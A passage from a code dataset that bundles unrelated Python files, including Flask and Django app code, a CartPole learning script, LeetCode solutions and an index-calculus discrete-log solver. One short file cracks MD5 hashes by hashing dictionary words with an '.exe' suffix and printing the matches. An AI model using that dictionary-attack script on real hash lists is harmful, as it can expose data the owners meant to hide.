self.peptide_length)):\n# count = self.count_macrocycles()\n# macrocycle_idxs = list(sample(range(count), self.num_conformers))\n# macrocycle_idxs.sort()\n# self.saver.save(macrocycle_idxs)\n\n# def count_macrocycles(self):\n\n# # total number of macrocycles was given to us\n# if self.macrocycle_loader is None:\n# return self.num_macrocycles\n\n# for i, _ in enumerate(self.macrocycle_loader.iterate()):\n# pass\n\n# return i\n\n\nclass ConformerPublicationPlanner(IPlanner):\n\n def __init__(self, peptide_length, num_conformers, num_macrocycles):\n self.macrocycle_loader = project_io.get_macrocycle_io(peptide_length=peptide_length, job_num=None)\n self.saver = project_io.ConformerPlannerIO(peptide_length)\n self.peptide_length = peptide_length\n self.num_conformers = num_conformers\n\n def create_plan(self):\n\n if not os.path.exists(utils.attach_file_num(self.saver.FILEPATH, self.peptide_length)):\n filepaths = glob.glob(utils.attach_file_num(self.macrocycle_loader.FILEPATH, self.peptide_length, '*'))\n count = 0\n selected_filepaths = set()\n while count < self.num_conformers:\n filepath = choice(filepaths)\n if filepath not in selected_filepaths:\n count += self.count_macrocycles(filepath)\n selected_filepaths.add(filepath)\n\n self.saver.save(selected_filepaths)\n\n def count_macrocycles(self, filepath):\n with open(filepath, 'r') as file:\n return len(list(json.load(file)))\n","sub_path":"macrocycles/planners.py","file_name":"planners.py","file_ext":"py","file_size_in_byte":6538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"498269018","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\nimport sys\nimport hashlib\nimport os\n\nif os.path.isfile('american-english'):\n\tfile = 'american-english'\nelse:\n\tfile = '/usr/share/dict/american-english'\n\nhashes = open(sys.argv[1], 'r').read()\n\nwith open(file, 'r') as f:\n\toutput = []\n\tfor line in f:\n\t\th = hashlib.md5(line.rstrip() + '.exe').hexdigest()\n\t\tif h in hashes:\n\t\t\toutput.append(\"{0} - {1}\".format(h, line.rstrip() + '.exe'))\n\tif output:\n\t\tprint('\\n'.join(output))","sub_path":"Hiding_the_hashes.py","file_name":"Hiding_the_hashes.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"287594058","text":"from datetime import datetime\nfrom functionality.Base import Base\nmessage_dict={}\nclass GetByTime(Base):\n def __init__(self):\n super().__init__()\n pass\n \n def get (self,start,end):\n startEpoch=self.dateToEpoch(start)\n endEpoch=self.dateToEpoch(end)\n messages=self.redisDB.zrangebyscore(self.setName,startEpoch,endEpoch, withscores=True)\n return self.parseMessages (messages)\n\n\n def dateToEpoch(self,date):\n try:\n date=datetime.strptime(date, self.dateformat)\n except ValueError:\n raise ValueError(\"Incorrect data format, should be YYYY-MM-DD HH:MM:SS\")\n return int(datetime.timestamp(date))\n\n def parseMessages(self,messages):\n index=0\n for message in messages:\n message=self.parseMessage(message)\n index+=1\n message_dict[index]=message\n return message_dict","sub_path":"functionality/GetByTime.py","file_name":"GetByTime.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"173358872","text":"import math\n\nimport numpy as np\n\nimport gym\n\n\nN_BOXES = 162\nALPHA = 1000\nBETA = 0.5\nGAMMA = 0.90\nLAMBDA_W = 0.95\nLAMBDA_V = 0.9\n\nMAX_FAILURES = 1000\nMAX_STEPS = 100000\n\nONE_DEGREE = 0.0174532\nSIX_DEGREES = 0.1047192\nTWELVE_DEGREES = 0.2094384\nFIFTY_DEGREES = 0.87266\n\n\ndef parse_args():\n pass\n\n\ndef prob_push_right(s):\n return 1.0 / (1.0 + math.exp(-max(-50, min(s, 50.0))))\n\n\ndef get_box(env, state):\n x, x_dot, theta, theta_dot = state\n cart_bound, pole_bound = env.x_threshold, env.theta_threshold_radians\n cart_in_limits = -cart_bound <= x <= cart_bound\n pole_in_limits = -pole_bound <= theta <= pole_bound\n\n if not cart_in_limits or not pole_in_limits:\n return -1\n\n box = (0 if x < -0.8 else\n 1 if x < 0.8 else\n 2)\n\n if x_dot < -0.5:\n pass\n elif x_dot < 0.5:\n box += 3\n else:\n box += 6\n\n if theta < -SIX_DEGREES:\n pass\n elif theta < -ONE_DEGREE:\n box += 9\n elif theta < 0:\n box += 18\n elif theta < ONE_DEGREE:\n box += 27\n elif theta < SIX_DEGREES:\n box += 36\n else:\n box += 45\n\n if theta_dot < -FIFTY_DEGREES:\n pass\n elif theta_dot < FIFTY_DEGREES:\n box += 54\n else:\n box += 108\n\n return box\n\n\ndef main():\n w, v, x_bar, e = np.zeros((4, N_BOXES))\n step, failure_count = 0, 0\n\n env = gym.make(\"CartPole-v0\")\n s = env.reset()\n box = get_box(env, s)\n\n while step < MAX_STEPS and failure_count < MAX_FAILURES:\n # env.render()\n\n y = np.random.random() < prob_push_right(w[box])\n e[box] += (1.0 - LAMBDA_W)*(y - 0.5)\n x_bar[box] += 1.0 - LAMBDA_V\n old_p = v[box]\n\n obs, reward, done, _ = env.step(y)\n box = get_box(env, obs)\n\n if box < 0 or done:\n failure_count += 1\n failed = True\n print(\"Trial {} was {} steps.\".format(failure_count, step))\n step = 0\n\n s = env.reset()\n box = get_box(env, s)\n\n r = -1.0\n p = 0.0\n\n else:\n failed = False\n r = 0.0\n p = v[box]\n\n rhat = r + GAMMA*p - old_p\n\n for i in range(N_BOXES):\n w[i] += ALPHA * rhat * e[i]\n v[i] += BETA * rhat * x_bar[i]\n if v[i] < -1.0:\n v[i] = v[i]\n\n if failed:\n e[i] = 0\n x_bar[i] = 0\n else:\n e[i] *= LAMBDA_W\n x_bar[i] *= LAMBDA_V\n\n step += 1\n\n if failure_count == MAX_FAILURES:\n print(\"Pole not balanced. Stopping \"\n \"after {} failures\".format(failure_count))\n\n else:\n print(\"Pole was balanced successfully \"\n \"for at least {} steps.\".format(step))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"worlds/cartpole/sutton.py","file_name":"sutton.py","file_ext":"py","file_size_in_byte":2821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"500919807","text":"# this is to remove those line numbers\nimport os\nimport re\n\ndirectory = \"Current_Cases\"\n\nfor file in sorted(os.listdir(directory),\n key=lambda item: (int(item.partition('_')[2])\n if item[0].isdigit() else float('inf'), item)):\n filename = os.fsdecode(file)\n if filename.endswith(\".txt\"):\n print(os.path.join(directory), str(filename))\n with open(os.path.join(directory, str(filename)), 'r') as f:\n content = f.read()\n # print(content)\n content_new = re.sub(r'\\n(\\d*)\\\\\\.', r'\\n', content)\n f2 = open(os.path.join(directory, str(filename)), \"w+\")\n f2.write(content_new)\n\n # print(\"--------------------------------------------------------------------------------------------\")\n # print(content_new)\n","sub_path":"training_data/current_case_preprocess.py","file_name":"current_case_preprocess.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"604053571","text":"#O(n)\nclass Solution(object):\n def missingNumber(self, nums):\n nums.append(-1)\n i = 0\n while i < len(nums):\n if nums[i] != -1:\n while nums[i] != i:\n if nums[i] == -1: break\n nums[nums[i]], nums[i] = nums[i], nums[nums[i]]\n i += 1\n i = 0\n while i < len(nums):\n if nums[i] != i: return i\n i += 1\n\n\n# sort + binary search\n\nclass Solution(object):\n def missingNumber(self, nums):\n nums.sort()\n i, j = 0, len(nums)-1\n while i 0:\n return redirect(url_for('annotate'))\n else:\n return render_template('home.html', annotations_todo = 0)\n \"\"\"\n evals_todo = Eval.query.filter_by(user_id = int(current_user.get_id()), evaled=False).count()\"\"\"\n return render_template('home.html', annotations_todo = annotations_todo)\n\n\n form = LoginForm()\n return render_template('home.html', form=form)\n\n\n@app.route(\"/about\")\ndef about():\n return render_template('about.html', title='About')\n\n\n@app.route(\"/register\", methods=['GET', 'POST'])\ndef register():\n if current_user.is_authenticated:\n return redirect(url_for('home'))\n form = RegistrationForm()\n if form.validate_on_submit():\n hashed_password = bcrypt.generate_password_hash(\n form.password.data).decode('utf-8')\n empty_user = User.query.filter_by(registered=False).first()\n empty_user.username = form.username.data\n empty_user.email = form.email.data\n empty_user.password = hashed_password\n empty_user.native_language = form.native_language.data \n empty_user.german_level = form.german_level.data \n empty_user.english_level = form.english_level.data\n empty_user.registered = True\n db.session.commit()\n flash('Your account has been created! You are now able to log in', 'success')\n return redirect(url_for('login'))\n return render_template('register.html', title='Register', form=form)\n\n\n@app.route(\"/login\", methods=['GET', 'POST'])\ndef login():\n if current_user.is_authenticated:\n return redirect(url_for('annotate'))\n\n form = LoginForm()\n\n if form.validate_on_submit():\n user = User.query.filter_by(email=form.email.data).first()\n\n if user and bcrypt.check_password_hash(user.password, form.password.data):\n login_user(user, remember=form.remember.data)\n next_page = request.args.get('next')\n\n return redirect(next_page) if next_page else redirect(url_for('home'))\n\n else:\n flash('Login unsuccessful. Please check email and password', 'danger')\n\n return render_template('login.html', title='Login', form=form)\n\n\n@app.route(\"/logout\")\ndef logout():\n logout_user()\n return redirect(url_for('home'))\n\n\n@app.route(\"/account\", methods=['GET', 'POST'])\n@login_required\ndef account():\n return render_template('account.html')\n\n\n@app.route(\"/annotate\", methods=['GET', 'POST'])\n@login_required\ndef annotate():\n\n form = AnnotationForm()\n\n if form.validate_on_submit():\n key = int(form.key.data)\n toAnnotate = Annotation.query.filter_by(id=key).first()\n userChoice = None\n if form.userchoice.data == \"marking\":\n userChoice = fb_type.marking\n elif form.userchoice.data == \"postedit\":\n userChoice = fb_type.post_edit\n else:\n userChoice = toAnnotate.feedback_type\n toAnnotate.annotation = form.annotationfield.data\n toAnnotate.time_started = form.timestarted.data\n toAnnotate.time_submitted = form.timesubmitted.data\n toAnnotate.key_strokes = form.keystrokes.data\n toAnnotate.click_count = form.clicks.data\n toAnnotate.time_paused = form.timepaused.data\n toAnnotate.user_choice = userChoice\n toAnnotate.annotated = True\n db.session.commit()\n return redirect('/annotate')\n else:\n print(form.errors)\n\n\n nextAnnotate = Annotation.query.filter_by(\n user_id=current_user.id, annotated=False).order_by(Annotation.id).first()\n\n\n if nextAnnotate == None:\n return redirect('/home')\n\n target = nextAnnotate.target\n target = target.replace('\"', '\\\\\"')\n\n form.key.default = str(nextAnnotate.id)\n form.process()\n if nextAnnotate.feedback_type == fb_type.post_edit:\n instructions = \"Please post-edit the translated sentence below with your improvements.\"\n return render_template('annotate.html', title='Annotate', instructions=instructions, source=nextAnnotate.src, target=target, form=form, fb_type=\"postedit\")\n\n if nextAnnotate.feedback_type == fb_type.marking:\n instructions = \"Please click or highlight incorrect words in the translated sentence below.\"\n return render_template('annotate.html', title='Annotate', instructions=instructions, source=nextAnnotate.src, target=target, form=form, fb_type=\"marking\")\n instructions = \"\"\"Please select either Post Edits or Markings.\n Post Edits: Edit the target sentence with your improvements.\n Markings: Mark incorrect words by clicking or highlighting.\"\"\"\n return render_template('annotate.html', title='Annotate', instructions=instructions, source=nextAnnotate.src, target=target, form=form, fb_type=\"userchoice\")\n\n\n@app.route(\"/eval\", methods=['GET', 'POST'])\n@login_required\ndef eval():\n form = EvalForm()\n form.minimum = -1\n form.maximum = 2\n if form.validate_on_submit():\n toEval = Eval.query.filter_by(id=int(form.key.data)).first()\n toEval.better = form.better.data\n toEval.time_paused = form.timepaused.data\n toEval.time_started = form.timestarted.data\n toEval.time_submitted = form.timesubmitted.data\n toEval.click_count = form.clicks.data\n toEval.evaled = True\n db.session.commit()\n return redirect(\"/eval\")\n\n nextEval = Eval.query.filter_by(user_id=current_user.id, evaled=False).first()\n\n if (nextEval == None):\n flash('There are currently no more evaluations for you at this moment.')\n return redirect('/home')\n target1 = nextEval.target1\n target2 = nextEval.target2\n src = nextEval.src\n target1.replace(\"'\", \"\\'\")\n target2.replace(\"'\", \"\\'\")\n choices = [['1', target1], ['2', target2]]\n random.shuffle(choices)\n choices.append(['-1', \"No Preference\"])\n form.key.default = int(nextEval.id)\n form.process()\n choice_json = json.dumps(choices)\n return render_template('eval.html', source=src, form=form, targets=choices, action=\"eval\")\n\n@app.route(\"/ranking\", methods=['GET', 'POST'])\n@login_required\ndef ranking():\n form = EvalForm()\n form.minimum = -1\n form.maximum = 5\n if form.validate_on_submit():\n toRank = Ranking.query.filter_by(id=int(form.key.data)).first()\n better = form.better.data\n toRank.time_paused = form.timepaused.data\n toRank.time_started = form.timestarted.data\n toRank.time_submitted = form.timesubmitted.data\n toRank.click_count = form.clicks.data\n toRank.ranking = str(better)\n toRank.ranked = True\n db.session.commit()\n return redirect(\"/ranking\")\n\n nextRank = Ranking.query.filter_by(user_id=current_user.id, ranked=False).first()\n\n if (nextRank == None):\n flash('There are currently no more evaluations for you at this moment.')\n return redirect('/home')\n target1 = nextRank.target1\n target2 = nextRank.target2\n target3 = nextRank.target3\n target4 = nextRank.target4\n target5 = nextRank.target5\n\n src = nextRank.src\n target1.replace(\"'\", \"\\\\\\'\")\n target2.replace(\"'\", \"\\\\\\'\")\n target3.replace(\"'\", \"\\\\\\'\")\n target4.replace(\"'\", \"\\\\\\'\")\n target5.replace(\"'\", \"\\\\\\'\")\n form.key.default = int(nextRank.id)\n form.process()\n choices = [['1', target1], ['2', target2], ['3', target3], ['4', target4], ['5', target5]]\n random.shuffle(choices)\n choices.append(['-1', \"No Preference\"])\n\n choice_json = json.dumps(choices)\n return render_template('eval.html', source=src, form=form, targets=choices, action=\"ranking\")\n\n","sub_path":"annotproj/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":8627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"235234270","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom app.models.contacts_model import *\nfrom app.models.collects_model import *\nfrom app.models.users_model import *\nfrom app.models.products_model import *\n\nfrom uuid import uuid4\nimport os\n\n#==========================================================================\n# CHANGE PRODUCT FILE NAMES\n#==========================================================================\n#\ndef attachments_rename(instance, filename):\n\n upload_path = 'creditnotes'\n return os.path.join(upload_path,'{}/{}'.format(uuid4().hex, filename))\n\n\n#**************************************************************************\n# Journal entry\n#**************************************************************************\n\nclass JournalEntry(models.Model):\n\n JOURNAL_TYPE = (\n ('off', 'off'),\n ('on', 'on'),\n )\n\n SAVE_TYPES = (\n (1, 'save_close'),\n (2, 'save_draft'),\n (3, 'save_downaload'),\n )\n user = models.ForeignKey(User, on_delete = models.CASCADE, db_index = True, null = True,)\n \n journalentry_number = models.CharField(\n max_length = 100,\n db_index = True,\n blank=True,\n null=True,\n\n ) \n\n save_type = models.IntegerField( \n db_index = True,\n default = 1,\n choices = SAVE_TYPES,\n )\n\n journalentry_number_check = models.CharField(\n db_index = True,\n max_length=4,\n default = 'off',\n choices = JOURNAL_TYPE,\n \n ) \n\n journalentry_date = models.DateField(\n auto_now=False,\n auto_now_add=False, \n db_index = True,\n blank= False,\n null= False,\n )\n journalentry_refrence = models.CharField(\n db_index = True,\n max_length=100,\n blank = True,\n null=True\n )\n\n Note = models.CharField(\n max_length = 400,\n blank = True, \n null = True, \n db_index = True,\n )\n\n attachements = models.FileField(\n upload_to = attachments_rename,\n db_index = True,\n blank = True,\n null = True,\n )\n\n total_amount_debit = models.CharField(\n max_length=20,\n db_index = True,\n blank = True,\n null = True,\n )\n\n total_amount_credit = models.CharField(\n max_length=20,\n db_index = True,\n blank = True,\n null = True,\n )\n\n journal_delete_status = models.IntegerField(\n db_index = True,\n default=0,\n blank = False,\n null = False,\n )\n \n def __str__(self):\n return \"{} - {}\".format(self.journalentry_number,self.id) \n\n class Meta:\n verbose_name_plural = 'journal_entry_tbl'\n#**************************************************************************\n# ADD ITEM'S DATA\n#**************************************************************************\n\nclass JournalEntry_Items(models.Model): \n\n user = models.ForeignKey(User, on_delete = models.CASCADE, db_index = True, null = True,)\n\n journalentry = models.ForeignKey(JournalEntry,\n db_index = True,\n blank = True,\n null = True,\n on_delete = models.CASCADE, \n )\n\n accounts_items = models.ForeignKey(\n MajorHeads,\n db_index = True,\n blank = True,\n null = True,\n on_delete = models.CASCADE,\n )\n\n description = models.TextField(\n db_index = True,\n max_length=250,\n blank = True,\n null=True\n )\n\n journal_entry_customer = models.ForeignKey(\n Contacts, \n on_delete = models.SET_NULL, \n db_index = True,\n null = True,\n blank = True,\n )\n\n debit = models.CharField(\n max_length=10,\n db_index = True,\n blank = True,\n null = True,\n )\n\n credit = models.CharField(\n max_length=10,\n db_index = True,\n blank = True,\n null = True,\n )\n\n def __str__(self):\n return \"{} ({})\".format(self.journalentry,self.id) \n\n class Meta:\n verbose_name_plural = 'journalentry_items_tbl'","sub_path":"app/models/journalentry_model.py","file_name":"journalentry_model.py","file_ext":"py","file_size_in_byte":4101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"79020037","text":"# coding: utf-8\n\nfrom django.shortcuts import render\nfrom django.shortcuts import render_to_response\nfrom ucms.models import *\n\n## 全局变量声明这只是个标注并没有什么实际用途{'pageeng_name':(templatelocation,pagech_name)\npages={'index':('backlearning/index.html',u'首页'),\n 'viewlist':('backlearning/list.html',u'NONE'),\n 'article':('backlearning/article.html',u'列表页'),\n 'error':('backlearning/error.html',u'错误')}\n\ndef index(request):\n c={}\n MainBlocks = Block.objects.filter(state = 3)\n c.update({'MainBlocks':MainBlocks})\n c.update({'pagename':u'blacksea3的后花园'})\n return render_to_response('backlearning/index.html',c)\n\ndef viewlist(request,bid):\n bid = int(bid)\n c={}\n MainBlocks = Block.objects.filter(state = 3)\n CurrentBlock = Block.objects.filter(state = 3, id = bid)\n MainArticles = Article.objects.filter(bid = bid)\n c.update({'MainArticles':MainArticles,'MainBlocks':MainBlocks,'CurrentBlock':CurrentBlock[0]})\n c.update({'pagename':CurrentBlock[0].ch_name})\n return render_to_response('backlearning/list.html',c)\n\ndef article(request,aid):\n aid = int(aid)\n c={}\n MainBlocks = Block.objects.filter(state = 3)\n CurrentArticle = Article.objects.filter(id=aid)\n c.update({'MainBlocks':MainBlocks,'CurrentArticle':CurrentArticle[0],'pagename':CurrentArticle[0].title})\n return render_to_response('backlearning/article.html',c)","sub_path":"backlearning/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"2177175","text":"# code n.0\ncity = \"Wroclaw\"\ntoday = 6\nprint(\"Today is\", today,\"in\",city)\n# output: Today is 6 in Wroclaw\n\n# code n.1\nmy_age = 28\nyour_age = \"22\"\n# my_age + your_age\n# output: Error('str' i 'int' nie łączą się '+')\nprint(my_age, \"+\", your_age, \"=\", my_age + int(your_age))\n# output: 28 + 22 = 50\n\n# code n.2\nmy_age = \"28\"\nyour_age = \"22\"\nprint(my_age + your_age)\n# output: 2822\n# Łączenie Stringów\n\n# code n.3\ncity = \"Wroclaw\"\ncountry = \"Poland\"\nprint(city, \"is in\", country)\n# print(country, \"is in\", europe)\n# output: Error('europe' niezdefiniowane)\neurope = \"Europe\"\nprint(country, \"is in\", europe)\n# output: Poland is in Europe\n\n# code n.4\ninitial = \"left\"\nposition = initial\ninitial = \"right\"\nprint(position)\n# output: left","sub_path":"Zajecia 2/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"451699734","text":"from __future__ import division\r\n\r\nimport numpy as np\r\nimport math\r\nfrom functools import reduce\r\nfrom operator import mul\r\n\r\n\r\ndef crt(M, N):\r\n #Extended Euclidian Algorithm\r\n prod = reduce(mul, N, 1)\r\n result = 0\r\n\r\n for i in range(0, len(M)):\r\n pp = prod // N[i]\r\n result += M[i]*pp*modinv(pp,N[i])\r\n \r\n return(result % prod)\r\n\r\n#Modular inverse \r\ndef egcd(a, b):\r\n if a == 0:\r\n return (b, 0, 1)\r\n else:\r\n g, y, x = egcd(b % a, a)\r\n return (g, x - (b // a) * y, y)\r\n\r\ndef modinv(a, m):\r\n g, x, y = egcd(a, m)\r\n if g != 1:\r\n raise ZeroDivisionError('mod div error')\r\n else:\r\n return x % m\r\n\r\n#Factorize over the FactorBase\r\ndef primeFactorsBase(n, factorBase):\r\n primes = []\r\n index = 0\r\n i = factorBase[index]\r\n \r\n while i <= n:\r\n\r\n if n % i == 0:\r\n primes.append(i)\r\n n = n // i \r\n else:\r\n index += 1\r\n if index >= len(factorBase):\r\n return []\r\n else:\r\n i = factorBase[index]\r\n return primes\r\n\r\n#LinearDependence(vector, matrix)\r\ndef linearDep(v, M):\r\n if(len(M) ==0):\r\n return False\r\n\r\n Y = list(M)\r\n Y.append(v)\r\n s = np.asarray(v)\r\n Y = np.asarray(Y)\r\n \r\n \r\n Z = np.asmatrix(Y)\r\n \r\n \r\n numRows, numCols = Z.shape\r\n \r\n \r\n r = np.linalg.matrix_rank(Z)\r\n\r\n if(r == min(numRows,len(v))):\r\n return False\r\n else:\r\n return True\r\n \r\ndef Gauss(N, mod):\r\n M = np.copy(N)\r\n n = len(M)\r\n print('------- GAUSS ---------')\r\n print(M)\r\n\r\n for q in range(0,n):\r\n for m in range(0,len(M[0])):\r\n M[q][m] = M[q][m] % mod\r\n\r\n for k in range(0,len(M[0])-1):\r\n maxindex = abs(M[k:,k]).argmax() + k\r\n\r\n #Swap\r\n if maxindex != k:\r\n M[[k,maxindex]]=M[[maxindex,k]]\r\n #Pivot to 1\r\n\r\n if(M[k][k] == 0):\r\n continue\r\n inv = modinv(M[k][k], mod)\r\n M[k] = M[k] * inv % mod\r\n \r\n #Row Below pivot\r\n for row in range(k+1,n):\r\n mult = M[row][k]\r\n print(M)\r\n M[row, k:] = (M[row, k:] - mult * M[k,k:]) % mod\r\n print(M)\r\n print(\"out:\")\r\n print(M)\r\n \r\n return(M)\r\n \r\n#Discrete Log \r\ndef dilog(alpha, factorBase, p, beta, order):\r\n ReducedCoef = []\r\n TabCoef = []\r\n ProcessRow = []\r\n ProcessTable = []\r\n\r\n #k = np.random.randint(max(factorBase)+1,p-1)\r\n k = max(factorBase)+1\r\n C = []\r\n\r\n ######Part 1 Precompute\r\n\t### 4 more vectors because CRT may produce bogus column (not good for GaussAlgo)\r\n while len(TabCoef) < len(factorBase) + 4 :\r\n n = alpha ** k % p\r\n F = primeFactorsBase(n,factorBase)\r\n \r\n \r\n ###### Part 2 Solve log_alpha of factorBase\r\n if( len(F) !=0 ):\r\n #empty list == false\r\n j = 0\r\n while len(F) !=0:\r\n if(F[0] == factorBase[j]):\r\n ReducedCoef.append(F.count(F[0]))\r\n F = F[F.count(F[0]):len(F)]\r\n else:\r\n ReducedCoef.append(0)\r\n j = j+1\r\n\r\n while len(ReducedCoef) < len(factorBase):\r\n ReducedCoef.append(0)\r\n\r\n \r\n if not(linearDep(ReducedCoef,TabCoef)) :\r\n \r\n TabCoef.append(ReducedCoef)\r\n #print(ReducedCoef)\r\n ProcessRow = list(ReducedCoef)\r\n ProcessRow.append(k)\r\n ProcessTable.append(ProcessRow)\r\n\r\n ReducedCoef = []\r\n ReducedF = []\r\n \r\n #k = np.random.randint(max(factorBase)+1,p-1)\r\n k = k + 1\r\n \r\n Syst = np.asarray(ProcessTable)\r\n n=len(Syst)\r\n\r\n ##### No CRT\r\n Out = Gauss(Syst, order)\r\n A = np.delete(Out,len(Syst[0])-1,axis=1)\r\n b = np.delete(Out,[range(0,len(Syst[0])-1)],axis=1)\r\n\r\n x = np.zeros(len(Syst[0]) - 1)\r\n for k in range(len(Syst[0])-2,-1,-1):\r\n dot = np.dot(A[k][k+1:],x[k+1:]) % order\r\n \r\n # 1 = modinv(A[k,k],(p-1)//2))\r\n x[k] = ((b[k] - dot) * 1) % order\r\n print(x)\r\n #print(Out)\r\n\r\n \r\n #####Chinese Remainder Theorem // If needed\r\n\t#### This whole process should be automated\r\n\t#### Here it's computed manually after the mod inverse returning an error\r\n\t################# Not used because order is prime... \r\n\t##### CRT options: 2 for Textbook example, 2 + 3 for p=59407\r\n '''Out = Gauss(Syst,order // 6)\r\n \r\n A = np.delete(Out,len(Syst[0])-1,axis=1)\r\n b = np.delete(Out,[range(0,len(Syst[0])-1)],axis=1)\r\n\r\n x = np.zeros(len(Syst[0]) - 1)\r\n\r\n\r\n for k in range(len(Syst[0])-2,-1,-1):\r\n dot = np.dot(A[k][k+1:],x[k+1:]) % ((p-1)//(6))\r\n \r\n # 1 = modinv(A[k,k],(p-1)//2))\r\n x[k] = ((b[k] - dot) * 1) % ((p-1)//(6)) \r\n print(x)\r\n \r\n ##### 2**q possible\r\n Out2 = Gauss(Syst, 2)\r\n print(Out2)\r\n\r\n A2 = np.delete(Out2,len(Syst[0])-1,axis=1)\r\n b2 = np.delete(Out2,[range(0,len(Syst[0])-1)],axis=1)\r\n print(A2)\r\n print(b2)\r\n\r\n y = np.zeros(len(Syst[0]) - 1)\r\n\r\n \r\n for k in range(len(Syst[0])-2,-1,-1):\r\n dot = np.dot(A2[k][k+1:],y[k+1:]) % 2\r\n if A2[k,k] == 0 :\r\n continue\r\n y[k] = ((b2[k] - dot) * 1) % 2\r\n\r\n ###\r\n Out3 = Gauss(Syst, 3)\r\n print(Out3)\r\n\r\n A3 = np.delete(Out3,len(Syst[0])-1,axis=1)\r\n b3 = np.delete(Out3,[range(0,len(Syst[0])-1)],axis=1)\r\n print(A3)\r\n print(b3)\r\n\r\n z = np.zeros(len(Syst[0]) - 1)\r\n\r\n \r\n for k in range(len(Syst[0])-2,-1,-1):\r\n dot = np.dot(A3[k][k+1:],z[k+1:]) % 3\r\n if A2[k,k] == 0 :\r\n continue\r\n z[k] = ((b3[k] - dot) * 1) % 3\r\n \r\n print(\"*******\")\r\n print(x)\r\n print(y)\r\n print(z)\r\n \r\n C = np.zeros(len(Syst[0]) - 1)\r\n for m in range(0,len(C)):\r\n C[m] = crt([x[m],y[m],z[m]],[(p-1)//6,2,3])\r\n \r\n print(C)\r\n '''\r\n #### No CRT ####\r\n C = np.copy(x)\r\n \r\n ######## PART 3: trial on s\r\n \r\n loop = True\r\n s = 0\r\n while loop:\r\n trial = (beta * alpha ** s) % p\r\n F = primeFactorsBase(trial,factorBase)\r\n\r\n #s found\r\n if(len(F) != 0):\r\n loop = False\r\n print(s)\r\n ReducedCoef = []\r\n j = 0\r\n while len(F) !=0:\r\n if(F[0] == factorBase[j]):\r\n ReducedCoef.append(F.count(F[0]))\r\n F = F[F.count(F[0]):len(F)]\r\n else:\r\n ReducedCoef.append(0)\r\n j = j+1\r\n\r\n while len(ReducedCoef) < len(factorBase):\r\n ReducedCoef.append(0)\r\n\r\n result = -s\r\n for l in range(0,len(C)):\r\n result = (result + C[l]*ReducedCoef[l]) % order\r\n \r\n s = s+1\r\n\r\n return result\r\n\r\n \r\n'''\r\nbeta = 9451\r\n#print(dilog(5,base, 14087, beta))\r\nbase = [2,3,5,7]\r\nprint(dilog(5,base, 10007, beta))\r\n\r\n'''\r\nbase = [2,3,5,7,11,13,17]\r\np = 10930889\r\nalpha = 2317547\r\nbeta = 5273437\r\norder = 59407\r\nprint(dilog(alpha,base, p, beta, order))\r\n\r\n","sub_path":"Project.py","file_name":"Project.py","file_ext":"py","file_size_in_byte":7169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"525550139","text":"\"\"\"\nGiven an array of strings, group anagrams together.\n\nFor example, given: [\"eat\", \"tea\", \"tan\", \"ate\", \"nat\", \"bat\"], \nReturn:\n\n[\n [\"ate\", \"eat\",\"tea\"],\n [\"nat\",\"tan\"],\n [\"bat\"]\n]\nNote:\nFor the return value, each inner list's elements must follow the lexicographic order.\nAll inputs will be in lower-case.\nUpdate (2015-08-09):\nThe signature of the function had been updated to return list> instead of list, as suggested here. If you still see your function signature return a list, please click the reload button to reset your code definition.\n\"\"\"\nclass Solution:\n # @param {string[]} strs\n # @return {string[][]}\n def groupAnagrams(self, strs):\n if strs == [\"\"]: return [[\"\"]]\n table = dict()\n for s in strs:\n k = list(s)\n k.sort()\n k = tuple(k)\n if k not in table:\n table[k] = [s]\n else:\n table[k].append(s)\n a = []\n [a.extend([sorted(i)]) for i in table.values()]\n return a","sub_path":"group_anagrams.py","file_name":"group_anagrams.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"339133918","text":"#!/usr/bin/env python3\nimport sys\nimport string\n\nlast_airport_id = None\ncur_1 = \"-\"\ncur_2 = \"-\"\ncur_3 = \"-\"\ncur_4 = \"-\"\ncur_5 = \"-\"\ncur_6 = \"-\"\n\nfor line in sys.stdin:\n\tline = line.strip()\n\tlinea = line.split(',')\n\tif not last_airport_id or last_airport_id != linea[0]:\n\t\tlast_airport_id = linea[0]\n\t\tcur_1 = linea[2]\n\t\tcur_2 = linea[3]\n\t\tcur_3 = linea[4]\n\t\tcur_4 = linea[5]\n\t\tcur_5 = linea[6]\n\t\tcur_6 = linea[7]\n\telif linea[0] == last_airport_id:\n\t\tlinea[1] = cur_1\n\t\tlinea[2] = cur_2\n\t\tlinea[3] = cur_3\n\t\tlinea[4] = cur_4\n\t\tlinea[5] = cur_5\n\t\tlinea[6] = cur_6\n\t\tprint(linea[1],sep='',end='')\n\t\tfor i in range(2,len(linea)):\n\t\t\tprint(',',linea[i],sep='',end='')\n\t\tprint('')\n","sub_path":"alumnos/francisco_bahena/tarea_3/parte_2/ejercicio_3/reducer3_2.py","file_name":"reducer3_2.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"15677662","text":"# Credits: 